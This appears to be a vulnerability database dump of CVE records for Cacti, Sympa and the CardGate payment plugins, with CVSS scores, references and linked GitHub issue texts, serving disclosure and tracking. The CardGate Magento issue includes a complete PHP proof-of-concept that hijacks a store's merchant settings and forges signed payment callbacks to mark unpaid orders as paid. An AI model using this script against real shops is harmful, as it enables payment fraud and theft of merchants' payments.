{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156537/Cacti-1.2.8-Unauthenticated-Remote-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156538/Cacti-1.2.8-Authenticated-Remote-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156593/Cacti-1.2.8-Unauthenticated-Remote-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/157477/Open-AudIT-Professional-3.3.1-Remote-Code-Execution.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/3285" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/Cacti/cacti/releases" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00039.html" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M77SS33IDVNGBU566TK2XVULPW3RXUQ4/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WAX3LDXPIKWNBGVZSIMZV7LI5K6BZRTO/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XEMDQXDRNQYXOME7TACKDVCXZXZNGZE2/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202004-16" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00042.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-04/msg00048.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156537/Cacti-1.2.8-Unauthenticated-Remote-Code-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156538/Cacti-1.2.8-Authenticated-Remote-Code-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156593/Cacti-1.2.8-Unauthenticated-Remote-Code-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/157477/Open-AudIT-Professional-3.3.1-Remote-Code-Execution.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/Cacti/cacti/issues/3285" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes" ], "url": "https://github.com/Cacti/cacti/releases" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00039.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/M77SS33IDVNGBU566TK2XVULPW3RXUQ4/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WAX3LDXPIKWNBGVZSIMZV7LI5K6BZRTO/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XEMDQXDRNQYXOME7TACKDVCXZXZNGZE2/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202004-16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cacti:cacti:1.2.8:*:*:*:*:*:*:*", "matchCriteriaId": "2D05824B-4E66-44CA-A862-0DDDB23C8C88", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:opmantek:open-audit:3.3.1:*:*:*:-:*:*:*", "matchCriteriaId": "89AEB128-B4F3-447F-B458-D4A34A477979", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:suse_package_hub:*:*:*:*:*:*:*:*", "matchCriteriaId": "90EA34D4-1AF5-4D1E-AA95-63C605BE1386", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:opensuse:suse_linux_enterprise_server:12.0:*:*:*:*:*:*:*", "matchCriteriaId": "BC3D1104-C0AA-45DE-86A1-5D7CC8281B39", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/Cacti/cacti/issues/3285
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "Cacti", "cacti" ]
**Describe the bug** Mohammad Askar of iSecurity has reported that graph_realtime.php prior to 1.2.10 allows remote attackers to execute arbitrary OS commands via shell metacharacters in a cookie if a guest user has the graph real-time privilege. **To Reproduce** Steps to reproduce the behavior: 1. Enable the guest account 2. Ensure the guest account has full access to realtime graphs 3. Change the 'Cacti' cookie to have malformed characters which could run a script. **Expected behavior** The raw output of the cookie should be treated as insecure and as such, a validated version of the value utilised. **Additional context** This was reported as CVE-2020-8813
When guest users have access to realtime graphs, remote code could be executed (CVE-2020-8813)
https://api.github.com/repos/Cacti/cacti/issues/3285/comments
3
2020-02-23T06:03:06Z
2020-06-30T12:30:28Z
https://github.com/Cacti/cacti/issues/3285
569,444,022
3,285
1,089
CVE-2020-9369
2020-02-24T18:15:22.960
Sympa 6.2.38 through 6.2.52 allows remote attackers to cause a denial of service (disk consumption from temporary files, and a flood of notifications to listmasters) via a series of requests with malformed parameters.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sympa-community/sympa/issues/886" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6TMVZ5LVYCCIHGEC7RQUMGUE7DJWUXN7/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/A3FUYYLV6URRLAJVWXNJYK2CNOKKNHXC/" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XO4WJYNNHWM7DUKCN4EWYYYPXZSOI7BQ/" }, { "source": "cve@mitre.org", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://sympa-community.github.io/security/2020-001.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4818" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/sympa-community/sympa/issues/886" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6TMVZ5LVYCCIHGEC7RQUMGUE7DJWUXN7/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/A3FUYYLV6URRLAJVWXNJYK2CNOKKNHXC/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XO4WJYNNHWM7DUKCN4EWYYYPXZSOI7BQ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://sympa-community.github.io/security/2020-001.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4818" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sympa:sympa:*:*:*:*:*:*:*:*", "matchCriteriaId": "AD0CD227-C6CC-426C-B13E-A3BE86861467", "versionEndExcluding": null, "versionEndIncluding": "6.2.52", "versionStartExcluding": null, "versionStartIncluding": "6.2.38", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:30:*:*:*:*:*:*:*", "matchCriteriaId": "97A4B8DF-58DA-4AB6-A1F9-331B36409BA3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/sympa-community/sympa/issues/886
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "sympa-community", "sympa" ]
<!--- ↑↑ Provide a general summary of the issue in the Title above ↑↑ --> Version ------- <!-- Versions of Sympa and related software --> 6.2.38 to 6.2.52. Installation method ------------------- <!-- How you installed Sympa: deb, rpm, ports, ... or source package --> Any. Expected behavior ----------------- <!--- Tell us what should happen --> There are no flaw. Actual behavior --------------- <!--- Tell us what happens instead of the expected behavior --> Sympa SA 2020-001 (candidate). Denial of service caused by malformed CSRF token. Additional information ---------------------- <!--- You may also attach files using "selecting them" link below. --> <!--- NOTE that you should not include sensitive information! --> - [x] [security advisory](https://sympa-community.github.io/security/2020-001.html) will be published later. - [x] Pull request has been prepared and will be submitted soon. - [x] New version of Sympa and a patch will be released.
[SA 2020-001] Security flaws in CSRF prevension, CVE-2020-9369
https://api.github.com/repos/sympa-community/sympa/issues/886/comments
2
2020-02-24T04:26:11Z
2020-02-25T06:47:53Z
https://github.com/sympa-community/sympa/issues/886
569,629,228
886
1,090
CVE-2020-8818
2020-02-25T02:15:12.097
An issue was discovered in the CardGate Payments plugin through 2.0.30 for Magento 2. Lack of origin authentication in the IPN callback processing function in Controller/Payment/Callback.php allows an attacker to remotely replace critical plugin settings (merchant ID, secret key, etc.) and therefore bypass the payment process (e.g., spoof an order status by manually sending an IPN callback request with a valid signature but without real payment) and/or receive all of the subsequent payments.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156505/Magento-WooCommerce-CardGate-Payment-Gateway-2.0.30-Bypass.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cardgate/magento2/blob/715979e54e1a335d78a8c5586f9e9987c3bf94fd/Controller/Payment/Callback.php#L88-L107" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cardgate/magento2/issues/54" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156505/Magento-WooCommerce-CardGate-Payment-Gateway-2.0.30-Bypass.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cardgate/magento2/blob/715979e54e1a335d78a8c5586f9e9987c3bf94fd/Controller/Payment/Callback.php#L88-L107" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cardgate/magento2/issues/54" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cardgate:cardgate_payments:*:*:*:*:*:*:*:*", "matchCriteriaId": "7BD035FF-55DF-417A-99B2-8D6B574A8010", "versionEndExcluding": null, "versionEndIncluding": "2.0.30", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:adobe:magento:2.3.4:*:*:*:*:*:*:*", "matchCriteriaId": "13054AA9-B4EF-40F2-9768-C4C00F766D40", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "346" ]
346
https://github.com/cardgate/magento2/issues/54
[ "Exploit", "Third Party Advisory" ]
github.com
[ "cardgate", "magento2" ]
### [CVE-2020-8818](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8818) Lack of origin authentication ([CWE-346](https://cwe.mitre.org/data/definitions/346.html)) at IPN callback processing function allow (**even _unauthorized_**) attacker to remotely replace critical plugin settings (merchant id, secret key etc) with known to him and therefore bypass payment process (eg. spoof order status by manually sending IPN callback request with a valid signature but without real payment) and/or receive all subsequent payments (on behalf of the store). ### Vulnerable code (fixed in PR #53) https://github.com/cardgate/magento2/blob/715979e54e1a335d78a8c5586f9e9987c3bf94fd/Controller/Payment/Callback.php#L88-L107 **Affected versions:** ≤ 2.0.30 **Tested on:** Magento 2.3.4 + [CardGate Payment Gateway Module 2.0.30](https://github.com/cardgate/magento2/releases/tag/v2.0.30) <details><summary><strong>Proof-of-Concept</strong></summary> ```php <?php /* Usage: 1. Change values of the constants (see below for TARGET & ORDER*) 2. Host this script somewhere (must be public accessible) 3. Register a merchant at https://cardgate.com 4. Sign into "My CardGate" dashboard 5. Add fake site or choose existing one 6. Click "Setup your Webshop" button in site preferences 7. Paste the URL of this script into the pop-up window and click "Save" 8. The target store now uses the settings of your site, enjoy :] P.S. It works perfectly in both Staging and Live modes, regardless of the current mode of the target shop. */ // -------- Options (start) -------- define('TARGET', 'http://domain.tld'); // without trailing slash, pls define('ORDER', '000000001'); // provide non-zero value to automagically spoof order status define('ORDER_AMOUNT', 1.00); // provide a valid total (to bypass built-in fraud protection) define('ORDER_CURRENCY', 'USD'); // provide a valid currency (same goal as above) define('ORDER_PAYMENT_TYPE', 'sofortbanking'); // provide a valid payment type slug (optional) // --------- Options (end) --------- define('API_STAGING', 'https://secure-staging.curopayments.net/rest/v1/curo/'); define('API_PRODUCTION', 'https://secure.curopayments.net/rest/v1/curo/'); /** * Original function from CardGate API client library (SDK) with minor changes * @param string $sToken_ * @param bool $bTestmode_ * @return string */ function pullConfig($sToken_, $bTestmode_ = FALSE) { if (!is_string($sToken_)) { throw new Exception('invalid token for settings pull: ' . $sToken_); } $sResource = "pullconfig/{$sToken_}/"; $sUrl = ($bTestmode_ ? API_STAGING : API_PRODUCTION) . $sResource; $rCh = curl_init(); curl_setopt($rCh, CURLOPT_URL, $sUrl); curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1); curl_setopt($rCh, CURLOPT_TIMEOUT, 60); curl_setopt($rCh, CURLOPT_HEADER, FALSE); curl_setopt($rCh, CURLOPT_HTTPHEADER, [ 'Content-Type: application/json', 'Accept: application/json' ]); if ($bTestmode_) { curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0); } else { curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, TRUE); curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 2); } if (FALSE == ($sResults = curl_exec($rCh))) { $sError = curl_error($rCh); curl_close($rCh); throw new Exception('Client.Request.Curl.Error: ' . $sError); } else { curl_close($rCh); } if (NULL === ($aResults = json_decode($sResults, TRUE))) { throw new Exception('remote gave invalid JSON: ' . $sResults); } if (isset($aResults['error'])) { throw new Exception($aResults['error']['message']); } return $aResults; } /** * Original function from CardGate API client library (SDK) with minor changes * @param string $sUrl * @param array $aData_ * @param string $sHttpMethod_ * @return string */ function doRequest($sUrl, $aData_ = NULL, $sHttpMethod_ = 'POST') { if (!in_array($sHttpMethod_, ['GET', 'POST'])) { throw new Exception('invalid http method: ' . $sHttpMethod_); } $rCh = curl_init(); curl_setopt($rCh, CURLOPT_RETURNTRANSFER, 1); curl_setopt($rCh, CURLOPT_TIMEOUT, 60); curl_setopt($rCh, CURLOPT_HEADER, FALSE); curl_setopt($rCh, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($rCh, CURLOPT_SSL_VERIFYHOST, 0); if ('POST' == $sHttpMethod_) { curl_setopt($rCh, CURLOPT_URL, $sUrl); curl_setopt($rCh, CURLOPT_POST, TRUE); curl_setopt($rCh, CURLOPT_POSTFIELDS, http_build_query($aData_)); } else { $sUrl = $sUrl . (FALSE === strchr($sUrl, '?') ? '?' : '&') . http_build_query($aData_) ; curl_setopt($rCh, CURLOPT_URL, $sUrl); } $response = curl_exec($rCh); if (FALSE == $response) { $sError = curl_error($rCh); curl_close($rCh); throw new Exception('Client.Request.Curl.Error: ' . $sError); } else { curl_close($rCh); } return $response; } if (!empty($_REQUEST['cgp_sitesetup']) && !empty($_REQUEST['token'])) { try { $aResult = pullConfig($_REQUEST['token'], $_REQUEST['testmode']); $aConfigData = $aResult['pullconfig']['content']; $response = doRequest(TARGET . '/cardgate/payment/callback', $_REQUEST, 'GET'); if ($response == $aConfigData['merchant_id'] . '.' . $aConfigData['site_id'] . '.200') { if (ORDER) { $payload = [ 'testmode' => $_REQUEST['testmode'], 'reference' => ORDER, 'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)), 'currency' => ORDER_CURRENCY, 'amount' => ORDER_AMOUNT * 100, 'status' => 'success', 'code' => 200, 'pt' => ORDER_PAYMENT_TYPE ]; $payload['hash'] = md5( (!empty($payload['testmode']) ? 'TEST' : '') . $payload['transaction'] . $payload['currency'] . $payload['amount'] . $payload['reference'] . $payload['code'] . $aConfigData['site_key'] ); $response = doRequest(TARGET . '/cardgate/payment/callback', $payload, 'GET'); if ($response == $payload['transaction'] . '.' . $payload['code']) { die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200'); } else { throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)"); } } else { die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200'); } } else { throw new Exception("It seems target is not vulnerable ($response)"); } } catch (\Exception $oException_) { die(htmlspecialchars($oException_->getMessage())); } } ``` </p> </details>
Public disclosure on CVE-2020-8818 [Unauthorized Payments Hijacking + Order Status Spoofing]
https://api.github.com/repos/cardgate/magento2/issues/54/comments
1
2020-02-24T18:42:21Z
2020-03-04T07:18:02Z
https://github.com/cardgate/magento2/issues/54
570,050,974
54
1,091
CVE-2020-8819
2020-02-25T02:15:12.160
An issue was discovered in the CardGate Payments plugin through 3.1.15 for WooCommerce. Lack of origin authentication in the IPN callback processing function in cardgate/cardgate.php allows an attacker to remotely replace critical plugin settings (merchant ID, secret key, etc.) and therefore bypass the payment process (e.g., spoof an order status by manually sending an IPN callback request with a valid signature but without real payment) and/or receive all of the subsequent payments.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 5.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156504/WordPress-WooCommerce-CardGate-Payment-Gateway-3.1.15-Bypass.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cardgate/woocommerce/blob/f2111af7b1a3fd701c1c5916137f3ac09482feeb/cardgate/cardgate.php#L426-L442" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cardgate/woocommerce/issues/18" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://wpvulndb.com/vulnerabilities/10097" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/48134" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/156504/WordPress-WooCommerce-CardGate-Payment-Gateway-3.1.15-Bypass.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cardgate/woocommerce/blob/f2111af7b1a3fd701c1c5916137f3ac09482feeb/cardgate/cardgate.php#L426-L442" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/cardgate/woocommerce/issues/18" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://wpvulndb.com/vulnerabilities/10097" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "https://www.exploit-db.com/exploits/48134" } ]
